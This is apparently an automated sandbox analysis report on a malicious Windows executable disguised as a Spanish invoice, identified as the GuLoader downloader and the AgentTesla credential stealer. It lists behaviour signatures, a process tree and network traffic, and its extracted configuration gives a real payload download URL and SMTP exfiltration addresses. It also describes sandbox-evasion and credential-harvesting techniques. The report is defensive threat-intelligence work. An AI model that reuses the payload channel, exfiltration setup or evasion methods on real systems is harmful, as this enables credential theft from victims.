Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 184285013-044310-Factura pendiente (2).exe

Overview

General Information

Sample Name:184285013-044310-Factura pendiente (2).exe
Analysis ID:530287
MD5:d69e979d7a91cdfa8915049a4e6454a5
SHA1:2c7904a4a0640f529231e1098757465f376a4735
SHA256:a4268d9fec123879950639a366105a0861d3168433164f6d5c1b80f65a16f490
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • 184285013-044310-Factura pendiente (2).exe (PID: 408 cmdline: "C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe" MD5: D69E979D7A91CDFA8915049A4E6454A5)
    • conhost.exe (PID: 376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • conhost.exe (PID: 1388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • CasPol.exe (PID: 376 cmdline: "C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "info@malkaratso.org.trMto1903mail.malkaratso.org.trwilliamsmith8135@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1eLHHSjrPsT_5Lmf"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000000.9991804971.0000000001340000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: CasPol.exe PID: 376JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: CasPol.exe PID: 376JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Conhost Parent Process ExecutionsShow sources
            Source: Process startedAuthor: omkar72: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 376, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 1388

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000004.00000000.9991804971.0000000001340000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1eLHHSjrPsT_5Lmf"}
            Source: CasPol.exe.376.4.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "info@malkaratso.org.trMto1903mail.malkaratso.org.trwilliamsmith8135@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: 184285013-044310-Factura pendiente (2).exeReversingLabs: Detection: 26%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01705220 CryptUnprotectData,4_2_01705220
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01705869 CryptUnprotectData,4_2_01705869
            Source: 184285013-044310-Factura pendiente (2).exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49798 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.11.20:49799 version: TLS 1.2

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1eLHHSjrPsT_5Lmf
            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 212.83.130.20 212.83.130.20
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1eLHHSjrPsT_5LmA9stSGbcgvR_KlZTCv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0bbf11090lmqcnv11oh7kschb18unor6/1638181725000/01591657853412424088/*/1eLHHSjrPsT_5LmA9stSGbcgvR_KlZTCv?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-7o-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49801 -> 212.83.130.20:587
            Source: global trafficTCP traffic: 192.168.11.20:49801 -> 212.83.130.20:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpString found in binary or memory: http://UEjXzO.com
            Source: CasPol.exe, 00000004.00000002.14843429399.000000000172B000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000002.14861622882.000000002068C000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14855864303.000000001E580000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14862012185.00000000206BA000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: CasPol.exe, 00000004.00000003.10184372785.00000000017B6000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.10188398344.00000000017B0000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14844252807.000000000179D000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000004.00000002.14861622882.000000002068C000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14855864303.000000001E580000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14862012185.00000000206BA000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: CasPol.exe, 00000004.00000002.14861622882.000000002068C000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14855864303.000000001E580000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14862012185.00000000206BA000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
            Source: CasPol.exe, 00000004.00000003.10184372785.00000000017B6000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.10188398344.00000000017B0000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14844252807.000000000179D000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000004.00000002.14855864303.000000001E580000.00000004.00000001.sdmpString found in binary or memory: http://mail.malkaratso.org.tr
            Source: CasPol.exe, 00000004.00000002.14855864303.000000001E580000.00000004.00000001.sdmpString found in binary or memory: http://malkaratso.org.tr
            Source: CasPol.exe, 00000004.00000002.14843429399.000000000172B000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000002.14861622882.000000002068C000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14855864303.000000001E580000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14862012185.00000000206BA000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: CasPol.exe, 00000004.00000003.10184372785.00000000017B6000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: CasPol.exe, 00000004.00000003.10184372785.00000000017B6000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: CasPol.exe, 00000004.00000003.10188398344.00000000017B0000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14843837643.0000000001765000.00000004.00000020.sdmpString found in binary or memory: https://doc-0s-7o-docs.googleusercontent.com/
            Source: CasPol.exe, 00000004.00000003.10184372785.00000000017B6000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.10188398344.00000000017B0000.00000004.00000001.sdmpString found in binary or memory: https://doc-0s-7o-docs.googleusercontent.com/:
            Source: CasPol.exe, 00000004.00000003.10184372785.00000000017B6000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.10188398344.00000000017B0000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14844252807.000000000179D000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000003.10184300032.00000000017B0000.00000004.00000001.sdmpString found in binary or memory: https://doc-0s-7o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0bbf1109
            Source: CasPol.exe, 00000004.00000002.14843429399.000000000172B000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000004.00000002.14843429399.000000000172B000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/:
            Source: CasPol.exe, 00000004.00000002.14843837643.0000000001765000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1eLHHSjrPsT_5LmA9stSGbcgvR_KlZTCv
            Source: CasPol.exe, 00000004.00000003.10184300032.00000000017B0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1eLHHSjrPsT_5LmA9stSGbcgvR_KlZTCvSygd5eE9AsoNeUIdw
            Source: CasPol.exe, 00000004.00000002.14855188333.000000001E4FE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 00000004.00000002.14855624319.000000001E558000.00000004.00000001.sdmpString found in binary or memory: https://nIf2mZFBKJ.org
            Source: CasPol.exe, 00000004.00000002.14855520820.000000001E544000.00000004.00000001.sdmpString found in binary or memory: https://nIf2mZFBKJ.orgD/o
            Source: CasPol.exe, 00000004.00000002.14855520820.000000001E544000.00000004.00000001.sdmpString found in binary or memory: https://nIf2mZFBKJ.orgt-
            Source: CasPol.exe, 00000004.00000002.14861622882.000000002068C000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14855864303.000000001E580000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.14862012185.00000000206BA000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: CasPol.exe, 00000004.00000002.14855188333.000000001E4FE000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: CasPol.exe, 00000004.00000002.14854458550.000000001E461000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1eLHHSjrPsT_5LmA9stSGbcgvR_KlZTCv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0bbf11090lmqcnv11oh7kschb18unor6/1638181725000/01591657853412424088/*/1eLHHSjrPsT_5LmA9stSGbcgvR_KlZTCv?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-7o-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49798 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.11.20:49799 version: TLS 1.2
            Source: 184285013-044310-Factura pendiente (2).exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_012811304_2_01281130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_012843204_2_01284320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0128C7B04_2_0128C7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0128BA504_2_0128BA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01283A504_2_01283A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_012837084_2_01283708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_012E6D904_2_012E6D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_012E07E04_2_012E07E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0166A09B4_2_0166A09B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01667A284_2_01667A28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0166B2084_2_0166B208
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01664EB04_2_01664EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01661D284_2_01661D28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_016665184_2_01666518
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_016641D14_2_016641D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_016687204_2_01668720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_016633304_2_01663330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0166F7804_2_0166F780
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_016656704_2_01665670
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_017019B04_2_017019B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0170880D4_2_0170880D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0170C3484_2_0170C348
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0170BF004_2_0170BF00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01707B404_2_01707B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01702E404_2_01702E40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01702E2A4_2_01702E2A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1E2F5E084_2_1E2F5E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1E2F46C44_2_1E2F46C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1E2F5D414_2_1E2F5D41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1E2F6AF14_2_1E2F6AF1
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000000.9793414358.0000000000424000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBanemand.exe vs 184285013-044310-Factura pendiente (2).exe
            Source: 184285013-044310-Factura pendiente (2).exe, 00000001.00000002.10212247842.0000000002A30000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameBanemand.exeFE2XCorps vs 184285013-044310-Factura pendiente (2).exe
            Source: 184285013-044310-Factura pendiente (2).exeBinary or memory string: OriginalFilenameBanemand.exe vs 184285013-044310-Factura pendiente (2).exe
            Source: 184285013-044310-Factura pendiente (2).exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: 184285013-044310-Factura pendiente (2).exeReversingLabs: Detection: 26%
            Source: 184285013-044310-Factura pendiente (2).exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe "C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe"
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe"
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeFile created: C:\Users\user\AppData\Local\Temp\~DF62B766E3E76984FB.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/2@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1388:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:376:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1388:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:376:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000004.00000000.9991804971.0000000001340000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 1_2_0040742B push ds; retf 1_2_00407434
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 1_2_00406124 push es; retf 1_2_00406125
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 1_2_00407254 push ds; retf 1_2_00407255
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 1_2_022C4234 push esp; iretd 1_2_022C4235
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 1_2_022C3F70 push esi; ret 1_2_022C3F71
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 1_2_022C13AC push esp; ret 1_2_022C13D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01285F10 push eax; retn 207Ah4_2_01285F15
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0170DC23 push edi; ret 4_2_0170DC26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01700312 push 8BFFFFFFh; retf 4_2_01700318
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
